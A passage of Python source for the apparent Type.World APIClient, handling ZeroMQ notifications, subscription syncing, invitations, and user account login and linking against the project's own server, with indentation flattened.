if self.user():
topicID = "user-%s" % self.user()
self.registerZMQCallback(topicID, self.zmqCallback)
self.manageMessageQueueConnection()
#
# Version-dependent startup procedures
#
# 0.2.10 or newer
if semver.VersionInfo.parse(typeworld.api.VERSION).compare("0.2.10-beta") >= 0:
# Delete all resources
for publisher in self.publishers():
for subscription in publisher.subscriptions():
subscription.remove("resources")
self.remove("resources")
except Exception as e: # nocoverage
self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def __repr__(self):
return f'<APIClient user="{self.user()}">'
def tracebackTest(self):
try:
assert abc # noqa: F821
except Exception as e:
self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e)
def tracebackTest2(self):
try:
assert abc # noqa: F821
except Exception:
self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name))
def wentOnline(self):
success, message = self.downloadSettings(performCommands=True)
assert success
assert self.get("downloadedSettings")["messagingQueue"].startswith("tcp://")
assert self.get("downloadedSettings")["breakingAPIVersions"]
print(self.get("downloadedSettings"))
def wentOffline(self):
pass
def zmqRestart(self):
self.zmqQuit()
self.wentOnline()
self.zmqSetup()
self.reRegisterZMQCallbacks()
def zmqSetup(self):
import zmq
import zmq.error
if not self._zmqRunning:
self._zmqctx = zmq.Context.instance()
self.zmqSocket = self._zmqctx.socket(zmq.SUB)
# https://github.com/zeromq/libzmq/issues/2882
self.zmqSocket.setsockopt(zmq.TCP_KEEPALIVE, 1)
self.zmqSocket.setsockopt(zmq.TCP_KEEPALIVE_CNT, 10)
self.zmqSocket.setsockopt(zmq.TCP_KEEPALIVE_IDLE, 30)
self.zmqSocket.setsockopt(zmq.TCP_KEEPALIVE_INTVL, 30)
target = self.get("downloadedSettings")["messagingQueue"]
self.zmqSocket.connect(target)
self._zmqRunning = True
self.zmqListenerThread = threading.Thread(target=self.zmqListener, daemon=True)
self.zmqListenerThread.start()
# MONITOR
self._zmqMonitor = self.zmqSocket.get_monitor_socket()
self.zmqMonitorThread = threading.Thread(
target=self.event_monitor,
args=(self._zmqMonitor,),
daemon=True,
)
self.zmqMonitorThread.start()
def event_monitor(self, monitor):
import zmq
from zmq.utils.monitor import recv_monitor_message
import zmq.error
EVENT_MAP = {}
for name in dir(zmq):
if name.startswith("EVENT_"):
value = getattr(zmq, name)
# print("%21s : %4i" % (name, value))
EVENT_MAP[value] = name
# Store these events:
error = [
"EVENT_CLOSED",
"EVENT_CONNECT_RETRIED",
"EVENT_CONNECT_DELAYED",
]
lostConnection = [
"EVENT_DISCONNECTED",
"EVENT_CLOSED",
]
connected = ["EVENT_HANDSHAKE_SUCCEEDED"]
try:
while monitor.poll():
evt = recv_monitor_message(monitor)
status = EVENT_MAP[evt["event"]]
if status in error:
self.delegate._messageQueueError(status=status)
if status in lostConnection:
zmqRestartThread = threading.Thread(target=self.delegate._messageQueueLostConnection, daemon=True)
zmqRestartThread.start()
# self.delegate._messageQueueLostConnection()
if status in connected:
self.delegate._messageQueueConnected()
evt.update({"description": status})
# print("Event: {}".format(evt))
if evt["event"] == zmq.EVENT_MONITOR_STOPPED:
break
except zmq.error.ZMQError:
pass
monitor.close()
# print("event monitor thread done!")
def zmqListener(self):
import zmq
import zmq.error
while self._zmqRunning:
time.sleep(0.1)
try:
topic, msg = self.zmqSocket.recv_multipart(flags=zmq.NOBLOCK)
topic = topic.decode()
msg = msg.decode()
if topic in self._zmqCallbacks:
self._zmqCallbacks[topic](msg)
except zmq.Again:
pass
except zmq.error.ZMQError:
pass
def quit(self):
self.zmqQuit()
def zmqQuit(self):
if self._zmqRunning:
# for topic in self._zmqCallbacks:
# self.zmqSocket.setsockopt(zmq.UNSUBSCRIBE, topic.encode("ascii"))
self._zmqRunning = False
self._zmqMonitor.close()
self.zmqSocket.close()
self._zmqctx.destroy()
self.zmqListenerThread.join()
self.zmqMonitorThread.join()
# self._zmqctx.term()
self.delegate._messageQueueDisconnected()
def reRegisterZMQCallbacks(self):
import zmq
import zmq.error
if self.zmqSubscriptions:
for topic in self._zmqCallbacks:
self.zmqSocket.setsockopt(zmq.SUBSCRIBE, topic.encode("ascii"))
def registerZMQCallback(self, topic, method):
import zmq
import zmq.error
if self.zmqSubscriptions:
if self._zmqRunning and not self.zmqSocket.closed:
self.zmqSocket.setsockopt(zmq.SUBSCRIBE, topic.encode("ascii"))
self._zmqCallbacks[topic] = method
def unregisterZMQCallback(self, topic):
import zmq
import zmq.error
if self.zmqSubscriptions:
if topic in self._zmqCallbacks:
if self._zmqRunning and not self.zmqSocket.closed:
self.zmqSocket.setsockopt(zmq.UNSUBSCRIBE, topic.encode("ascii"))
del self._zmqCallbacks[topic]
def zmqCallback(self, message):
try:
if message:
data = json.loads(message)
if data["command"] == "pullUpdates" and (
"sourceAnonymousAppID" not in data
or (
"sourceAnonymousAppID" in data
and data["sourceAnonymousAppID"]
and data["sourceAnonymousAppID"] != self.anonymousAppID()
)
):
self.delegate._userAccountUpdateNotificationHasBeenReceived()
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
# def clearPendingOnlineCommands(self):
# commands = self.get('pendingOnlineCommands') or {}
# commands['acceptInvitation'] = []
# commands['declineInvitation'] = []
# commands['downloadSubscriptions'] = []
# commands['linkUser'] = []
# commands['syncSubscriptions'] = []
# commands['unlinkUser'] = []
# commands['uploadSubscriptions'] = []
# self.set('pendingOnlineCommands', commands)
def holdsSubscriptionWithLiveNotifcations(self):
for publisher in self.publishers():
for subscription in publisher.subscriptions():
success, command = subscription.protocol.endpointCommand()
if success:
if command.sendsLiveNotifications:
return True
return False
def requiresMessageQueueConnection(self):
return (
(self.user() and self.get("userAccountStatus") == "pro")
or self.holdsSubscriptionWithLiveNotifcations()
or self.testing
# or self.testScenario == "simulateProAccount"
)
def manageMessageQueueConnection(self):
import zmq
import zmq.error
if self._isSetOnline and self.zmqSubscriptions:
requiresMessageQueueConnection = self.requiresMessageQueueConnection()
if requiresMessageQueueConnection and not self._zmqRunning:
self.zmqSetup()
for topic in self._zmqCallbacks:
self.zmqSocket.setsockopt(zmq.SUBSCRIBE, topic.encode("ascii"))
elif not requiresMessageQueueConnection and self._zmqRunning:
self.zmqQuit()
def get(self, key):
try:
return self._preferences.get("world.type.guiapp." + key) or self._preferences.get(key)
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def set(self, key, value):
try:
self._preferences.set("world.type.guiapp." + key, value)
self.delegate._clientPreferenceChanged(key, value)
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def remove(self, key):
try:
self._preferences.remove("world.type.guiapp." + key)
self._preferences.remove(key)
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def performRequest(self, url, parameters={}, method="POST"):
try:
parameters["sourceAnonymousAppID"] = self.anonymousAppID()
parameters["clientVersion"] = typeworld.api.VERSION
if self.testScenario == "simulateFaultyClientVersion":
parameters["clientVersion"] = "abc"
elif self.testScenario == "simulateNoClientVersion":
del parameters["clientVersion"]
if self.testing:
parameters["testing"] = "true"
# if self._isSetOnline:
if self.testScenario:
parameters["testScenario"] = self.testScenario
if self.testScenario == "simulateCentralServerNotReachable":
url = "https://api.type.worlddd/api"
return request(url, parameters, method)
# else:
# return False, 'APIClient is set to work offline as set by:
# APIClient(online=False)'
except Exception as e: # nocoverage
success, message = self.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
return success, message, None
def pendingInvitations(self):
try:
_list = []
if self.get("pendingInvitations"):
for invitation in self.get("pendingInvitations"):
invitation = APIPendingInvitation(invitation)
invitation.parent = self
_list.append(invitation)
return _list
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def acceptedInvitations(self):
try:
_list = []
if self.get("acceptedInvitations"):
for invitation in self.get("acceptedInvitations"):
invitation = APIAcceptedInvitation(invitation)
invitation.parent = self
_list.append(invitation)
return _list
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def sentInvitations(self):
try:
_list = []
if self.get("sentInvitations"):
for invitation in self.get("sentInvitations"):
invitation = APISentInvitation(invitation)
invitation.parent = self
_list.append(invitation)
return _list
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def secretSubscriptionURLs(self):
try:
_list = []
for publisher in self.publishers():
for subscription in publisher.subscriptions():
_list.append(subscription.protocol.secretURL())
return _list
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def unsecretSubscriptionURLs(self):
try:
_list = []
for publisher in self.publishers():
for subscription in publisher.subscriptions():
_list.append(subscription.protocol.unsecretURL())
return _list
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def timezone(self):
try:
return strftime("%z", gmtime())
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def syncProblems(self):
return self._syncProblems
def addMachineIDToParameters(self, parameters):
try:
(
machineModelIdentifier,
machineHumanReadableName,
machineSpecsDescription,
) = MachineName()
if machineModelIdentifier:
parameters["machineModelIdentifier"] = machineModelIdentifier
if machineHumanReadableName:
parameters["machineHumanReadableName"] = machineHumanReadableName
if machineSpecsDescription:
parameters["machineSpecsDescription"] = machineSpecsDescription
import platform
parameters["machineNodeName"] = platform.node()
osName = OSName()
if osName:
parameters["machineOSVersion"] = osName
return parameters
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def online(self, server=None):
try:
if self.testScenario == "simulateNotOnline":
return False
if "GAE_DEPLOYMENT_ID" in os.environ:
return True # nocoverage
if not server:
server = "type.world"
if not server.startswith("http"):
server = "http://" + server
if server in self.lastOnlineCheck and type(self.lastOnlineCheck[server]) is float:
if time.time() - self.lastOnlineCheck[server] < 10:
return True
if server.startswith("http://"):
server = server[7:]
elif server.startswith("https://"):
server = server[8:]
# try:
# urllib.request.urlopen(server, context=self.sslcontext) # Python 3.x
# except urllib.error.URLError:
# return False
conn = httplib.HTTPConnection(server, timeout=5)
try:
conn.request("HEAD", "/")
conn.close()
# return True
except: # noqa
conn.close()
return False
# try:
# urllib2.urlopen(server, timeout=1)
# except urllib2.URLError as err:
# return False
# Do nothing if HTTP errors are returned, and let the subsequent methods
# handle the details
# except urllib.error.HTTPError:
# pass
self.lastOnlineCheck[server] = time.time()
return True
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def appendCommands(self, commandName, commandsList=["pending"]):
try:
# Set up data structure
commands = self.get("pendingOnlineCommands")
if not self.get("pendingOnlineCommands"):
commands = {}
# Init empty
if commandName not in commands:
commands[commandName] = []
if (
commandName in commands and len(commands[commandName]) == 0
): # set anyway if empty because NSObject immutability
commands[commandName] = []
self.set("pendingOnlineCommands", commands)
# Add commands to list
commands = self.get("pendingOnlineCommands")
if type(commandsList) in (str, int):
commandsList = [commandsList]
for commandListItem in commandsList:
if commandListItem not in commands[commandName]:
commands[commandName] = list(commands[commandName])
commands[commandName].append(commandListItem)
self.set("pendingOnlineCommands", commands)
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def performCommands(self):
log = False
if log:
print()
print("performCommands()")
# for line in traceback.format_stack():
# print(line.strip())
try:
success, message = True, None
self._syncProblems = []
if self.online():
self.delegate._userAccountIsReloading()
commands = self.get("pendingOnlineCommands") or {}
# unlinkUser
if "unlinkUser" in commands and commands["unlinkUser"]:
success, message = self.performUnlinkUser()
if log:
print("unlinkUser")
if success:
commands["unlinkUser"] = []
self.set("pendingOnlineCommands", commands)
else:
self._syncProblems.append(message)
# linkUser
if "linkUser" in commands and commands["linkUser"]:
success, message = self.performLinkUser(commands["linkUser"][0])
if log:
print("linkUser")
if success:
commands["linkUser"] = []
self.set("pendingOnlineCommands", commands)
else:
self._syncProblems.append(message)
# syncSubscriptions
if "syncSubscriptions" in commands and commands["syncSubscriptions"]:
success, message = self.performSyncSubscriptions(commands["syncSubscriptions"])
if log:
print("syncSubscriptions")
if success:
commands["syncSubscriptions"] = []
self.set("pendingOnlineCommands", commands)
else:
self._syncProblems.append(message)
# uploadSubscriptions
if "uploadSubscriptions" in commands and commands["uploadSubscriptions"]:
success, message = self.perfomUploadSubscriptions(commands["uploadSubscriptions"])
if log:
print("uploadSubscriptions")
if success:
commands["uploadSubscriptions"] = []
self.set("pendingOnlineCommands", commands)
else:
self._syncProblems.append(message)
# acceptInvitation
if "acceptInvitation" in commands and commands["acceptInvitation"]:
success, message = self.performAcceptInvitation(commands["acceptInvitation"])
if log:
print("acceptInvitation")
if success:
commands["acceptInvitation"] = []
self.set("pendingOnlineCommands", commands)
else:
self._syncProblems.append(message)
# declineInvitation
if "declineInvitation" in commands and commands["declineInvitation"]:
success, message = self.performDeclineInvitation(commands["declineInvitation"])
if log:
print("declineInvitation")
if success:
commands["declineInvitation"] = []
self.set("pendingOnlineCommands", commands)
else:
self._syncProblems.append(message)
# downloadSubscriptions
if "downloadSubscriptions" in commands and commands["downloadSubscriptions"]:
success, message = self.performDownloadSubscriptions()
if log:
print("downloadSubscriptions")
if success:
commands["downloadSubscriptions"] = []
self.set("pendingOnlineCommands", commands)
else:
self._syncProblems.append(message)
# downloadSettings
if "downloadSettings" in commands and commands["downloadSettings"]:
success, message = self.performDownloadSettings()
if log:
print("downloadSettings")
if success:
commands["downloadSettings"] = []
self.set("pendingOnlineCommands", commands)
else:
self._syncProblems.append(message)
self.delegate._userAccountHasReloaded()
if self._syncProblems:
return False, self._syncProblems[0]
else:
return True, None
else:
self.delegate._userAccountHasReloaded()
self._syncProblems.append("#(response.notOnline)")
return (
False,
["#(response.notOnline)", "#(response.notOnline.headline)"],
)
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def uploadSubscriptions(self, performCommands=True):
try:
self.appendCommands("uploadSubscriptions", self.secretSubscriptionURLs() or ["empty"])
# self.appendCommands("downloadSubscriptions")
success, message = True, None
if performCommands:
success, message = self.performCommands()
return success, message
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def perfomUploadSubscriptions(self, oldURLs):
try:
userID = self.user()
if userID:
if oldURLs == ["pending"]:
oldURLs = ["empty"]
self.set("lastServerSync", int(time.time()))
# self.log('Uploading subscriptions: %s' % oldURLs)
parameters = {
"anonymousAppID": self.anonymousAppID(),
"anonymousUserID": userID,
"subscriptionURLs": ",".join(oldURLs),
"secretKey": self.secretKey(),
}
success, response, headers = self.performRequest(
self.mothership + "/uploadUserSubscriptions", parameters
)
if not success:
return False, response
response = json.loads(response)
if response["response"] != "success":
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
# Success
return True, None
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def downloadSubscriptions(self, performCommands=True):
try:
if self.user():
self.appendCommands("downloadSubscriptions")
if performCommands:
return self.performCommands()
else:
return True, None
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def performDownloadSubscriptions(self):
try:
userID = self.user()
if userID:
parameters = {
"anonymousAppID": self.anonymousAppID(),
"anonymousUserID": userID,
"userTimezone": self.timezone(),
"secretKey": self.secretKey(),
}
success, response, responseObject = self.performRequest(
self.mothership + "/downloadUserSubscriptions", parameters
)
if not success:
return False, response
response = json.loads(response)
if response["response"] != "success":
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
self.set("lastServerSync", int(time.time()))
return self.executeDownloadSubscriptions(response)
return True, None
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def executeDownloadSubscriptions(self, response):
try:
oldURLs = self.secretSubscriptionURLs()
# Uninstall all protected fonts when app instance is reported as revoked
if response["appInstanceIsRevoked"]:
success, message = self.uninstallAllProtectedFonts()
if not success:
return False, message
# Verified Email Address
if "userAccountEmailIsVerified" in response:
self.set("userAccountEmailIsVerified", response["userAccountEmailIsVerified"])
# USer Account Status
if "userAccountStatus" in response:
self.set("userAccountStatus", response["userAccountStatus"])
# Website Token
if "typeWorldWebsiteToken" in response:
keyring = self.keyring()
keyring.set_password(
self.userKeychainKey(self.user()),
"typeWorldWebsiteToken",
response["typeWorldWebsiteToken"],
)
# Add new subscriptions
for incomingSubscription in response["heldSubscriptions"]:
# Incoming server timestamp
incomingServerTimestamp = None
if "serverTimestamp" in incomingSubscription and incomingSubscription["serverTimestamp"]:
incomingServerTimestamp = incomingSubscription["serverTimestamp"]
# Add new subscription
if incomingSubscription["url"] not in oldURLs:
success, message, publisher, subscription = self.addSubscription(
incomingSubscription["url"], remotely=True
)
if success:
if incomingServerTimestamp:
subscription.set("serverTimestamp", incomingServerTimestamp)
self.delegate._subscriptionHasBeenAdded(subscription, remotely=True)
else:
return (
False,
"Received from self.addSubscription() for %s: %s" % (incomingSubscription["url"], message),
)
# Update subscription
else:
subscription = None
for publisher in self.publishers():
for subscription in publisher.subscriptions():
if subscription.url == URL(incomingSubscription["url"]).unsecretURL():
break
if (
incomingServerTimestamp
and subscription.get("serverTimestamp")
and int(incomingServerTimestamp) > int(subscription.get("serverTimestamp"))
) or (incomingServerTimestamp and not subscription.get("serverTimestamp")):
success, message, changes = subscription.update()
if success:
subscription.set("serverTimestamp", int(incomingServerTimestamp))
def replace_item(obj, key, replace_value):
for k, v in obj.items():
if v == key:
obj[k] = replace_value
return obj
# oldPendingInvitations = self.pendingInvitations()
# Invitations
self.set(
"acceptedInvitations",
[replace_item(x, None, "") for x in response["acceptedInvitations"]],
)
self.set(
"pendingInvitations",
[replace_item(x, None, "") for x in response["pendingInvitations"]],
)
self.set(
"sentInvitations",
[replace_item(x, None, "") for x in response["sentInvitations"]],
)
# newPendingInvitations = self.pendingInvitations()
# TODO: trigger notification
# import threading
# preloadThread = threading.Thread(target=self.preloadLogos)
# preloadThread.start()
# Delete subscriptions
for publisher in self.publishers():
for subscription in publisher.subscriptions():
if not subscription.protocol.secretURL() in [
x["url"] for x in response["heldSubscriptions"]
] and not subscription.protocol.unsecretURL() in [
x["url"] for x in response["acceptedInvitations"]
]:
subscription.delete(remotely=True)
self.delegate._userAccountHasBeenUpdated()
return True, None
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def acceptInvitation(self, url):
try:
userID = self.user()
if userID:
self.appendCommands("acceptInvitation", [url])
return self.performCommands()
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def performAcceptInvitation(self, urls):
try:
userID = self.user()
# Get Invitation IDs from urls
IDs = []
for invitation in self.pendingInvitations():
for url in urls:
if invitation.url == url:
if invitation.ID not in IDs:
IDs.append(invitation.ID)
# assert len(IDs) == len(urls)
if userID:
self.set("lastServerSync", int(time.time()))
parameters = {
"anonymousAppID": self.anonymousAppID(),
"anonymousUserID": userID,
"subscriptionIDs": ",".join(IDs),
"secretKey": self.secretKey(),
}
success, response, responseObject = self.performRequest(
self.mothership + "/acceptInvitations", parameters
)
if not success:
return False, response
response = json.loads(response)
if response["response"] != "success":
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
# Success
return self.executeDownloadSubscriptions(response)
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def declineInvitation(self, url):
try:
userID = self.user()
if userID:
self.appendCommands("declineInvitation", [url])
return self.performCommands()
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def performDeclineInvitation(self, urls):
try:
userID = self.user()
# Get Invitation IDs from urls
IDs = []
for invitation in self.pendingInvitations():
for url in urls:
if invitation.url == url:
if invitation.ID not in IDs:
IDs.append(invitation.ID)
assert len(IDs) == len(urls)
if userID:
self.set("lastServerSync", int(time.time()))
parameters = {
"anonymousAppID": self.anonymousAppID(),
"anonymousUserID": userID,
"subscriptionIDs": ",".join(IDs),
"secretKey": self.secretKey(),
}
success, response, responseObject = self.performRequest(
self.mothership + "/declineInvitations", parameters
)
if not success:
return False, response
response = json.loads(response)
if response["response"] != "success":
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
# Success
return self.executeDownloadSubscriptions(response)
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def syncSubscriptions(self, performCommands=True):
try:
self.appendCommands("syncSubscriptions", self.secretSubscriptionURLs() or ["empty"])
if performCommands:
return self.performCommands()
else:
return True, None
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def performSyncSubscriptions(self, oldURLs):
try:
userID = self.user()
if userID:
if oldURLs == ["pending"]:
oldURLs = ["empty"]
self.set("lastServerSync", int(time.time()))
parameters = {
"anonymousAppID": self.anonymousAppID(),
"anonymousUserID": userID,
"subscriptionURLs": ",".join(oldURLs),
"secretKey": self.secretKey(),
}
success, response, responseObject = self.performRequest(
self.mothership + "/syncUserSubscriptions", parameters
)
if not success:
return False, response
response = json.loads(response)
if response["response"] != "success":
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
# Add new subscriptions
for url in response["subscriptions"]:
if url not in oldURLs:
(
success,
message,
publisher,
subscription,
) = self.addSubscription(url, remotely=True)
if not success:
return False, message
# Success
return True, len(response["subscriptions"]) - len(oldURLs)
return True, None
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def downloadSettings(self, performCommands=True):
try:
if performCommands:
return self.performDownloadSettings()
else:
self.appendCommands("downloadSettings")
return True, None
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def performDownloadSettings(self):
try:
parameters = {}
if self.user():
parameters["anonymousUserID"] = self.user()
parameters["secretKey"] = self.secretKey()
success, response, responseObject = self.performRequest(self.mothership + "/downloadSettings", parameters)
if not success:
return False, response
response = json.loads(response)
if response["response"] != "success":
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
self.set("downloadedSettings", response["settings"])
self.set("lastSettingsDownloaded", int(time.time()))
return True, None
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def user(self):
try:
return self.get("typeworldUserAccount") or ""
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def userKeychainKey(self, ID):
try:
return "https://%s@%s.type.world" % (ID, self.anonymousAppID())
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def secretKey(self, userID=None):
try:
keyring = self.keyring()
return keyring.get_password(self.userKeychainKey(userID or self.user()), "secretKey")
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def userName(self):
try:
keyring = self.keyring()
return keyring.get_password(self.userKeychainKey(self.user()), "userName")
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def userEmail(self):
try:
keyring = self.keyring()
return keyring.get_password(self.userKeychainKey(self.user()), "userEmail")
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def createUserAccount(self, name, email, password1, password2):
try:
if self.online():
if not name or not email or not password1 or not password2:
return False, "#(RequiredFieldEmpty)"
if password1 != password2:
return False, "#(PasswordsDontMatch)"
parameters = {
"name": name,
"email": email,
"password": password1,
}
if self.secretServerAuthKey:
parameters["SECRETKEY"] = self.secretServerAuthKey
success, response, responseObject = self.performRequest(
self.mothership + "/createUserAccount", parameters
)
if not success:
return False, response
response = json.loads(response)
if response["response"] != "success":
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
# success
return self.linkUser(response["anonymousUserID"], response["secretKey"])
else:
return (
False,
["#(response.notOnline)", "#(response.notOnline.headline)"],
)
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def deleteUserAccount(self, email, password):
try:
if self.online():
# Required parameters
if not email or not password:
return False, "#(RequiredFieldEmpty)"
# Unlink user first
if self.userEmail() == email:
success, message = self.performUnlinkUser()
if not success:
return False, message
parameters = {
"email": email,
"password": password,
}
success, response, responseObject = self.performRequest(
self.mothership + "/deleteUserAccount", parameters
)
if not success:
return False, response
response = json.loads(response)
if response["response"] != "success":
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
# success
return True, None
else:
return (
False,
["#(response.notOnline)", "#(response.notOnline.headline)"],
)
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def resendEmailVerification(self):
try:
parameters = {
"email": self.userEmail(),
}
success, response, responseObject = self.performRequest(
self.mothership + "/resendEmailVerification", parameters
)
if not success:
return False, response
response = json.loads(response)
if response["response"] != "success":
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
# success
return True, None
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def logInUserAccount(self, email, password):
try:
if not email or not password:
return False, "#(RequiredFieldEmpty)"
if self.online():
parameters = {
"email": email,
"password": password,
}
success, response, responseObject = self.performRequest(
self.mothership + "/logInUserAccount", parameters
)
if not success:
return False, response
response = json.loads(response)
if response["response"] != "success":
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
# success
return self.linkUser(response["anonymousUserID"], response["secretKey"])
else:
return (
False,
["#(response.notOnline)", "#(response.notOnline.headline)"],
)
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def linkUser(self, userID, secretKey):
try:
# Set secret key now, so it doesn't show up in preferences when offline
keyring = self.keyring()
keyring.set_password(self.userKeychainKey(userID), "secretKey", secretKey)
assert self.secretKey(userID) == secretKey
self.appendCommands("linkUser", userID)
self.appendCommands("syncSubscriptions")
self.appendCommands("downloadSubscriptions")
return self.performCommands()
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def performLinkUser(self, userID):
try:
parameters = {
"anonymousAppID": self.anonymousAppID(),
"anonymousUserID": userID,
"secretKey": self.secretKey(userID),
}
parameters = self.addMachineIDToParameters(parameters)
success, response, responseObject = self.performRequest(
self.mothership + "/linkTypeWorldUserAccount", parameters
)
if not success:
return False, response
response = json.loads(response)
if response["response"] != "success":
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
# Success
self.set("typeworldUserAccount", userID)
assert userID == self.user()
# ZMQ
topicID = "user-%s" % self.user()
self.registerZMQCallback(topicID, self.zmqCallback)
keyring = self.keyring()
if "userEmail" in response:
keyring.set_password(self.userKeychainKey(userID), "userEmail", response["userEmail"])
if "userName" in response:
keyring.set_password(self.userKeychainKey(userID), "userName", response["userName"])
return True, None
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def linkedAppInstances(self):
try:
if not self.user():
return False, "No user"
parameters = {
"anonymousAppID": self.anonymousAppID(),
"anonymousUserID": self.user(),
"secretKey": self.secretKey(),
}
success, response, responseObject = self.performRequest(self.mothership + "/userAppInstances", parameters)
if not success:
return False, response
response = json.loads(response)
if response["response"] != "success":
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
class AppInstance(object):
pass
# Success
instances = []
for serverInstance in response["appInstances"]:
instance = AppInstance()
for key in serverInstance:
setattr(instance, key, serverInstance[key])
instances.append(instance)
return True, instances
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def revokeAppInstance(self, anonymousAppID=None):
try:
if not self.user():
return False, "No user"
parameters = {
"anonymousAppID": anonymousAppID or self.anonymousAppID(),
"anonymousUserID": self.user(),
"secretKey": self.secretKey(),
}
success, response, responseObject = self.performRequest(self.mothership + "/revokeAppInstance", parameters)
if not success:
return False, response
response = json.loads(response)
if response["response"] != "success":
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
return True, None
except Exception as e: # nocoverage
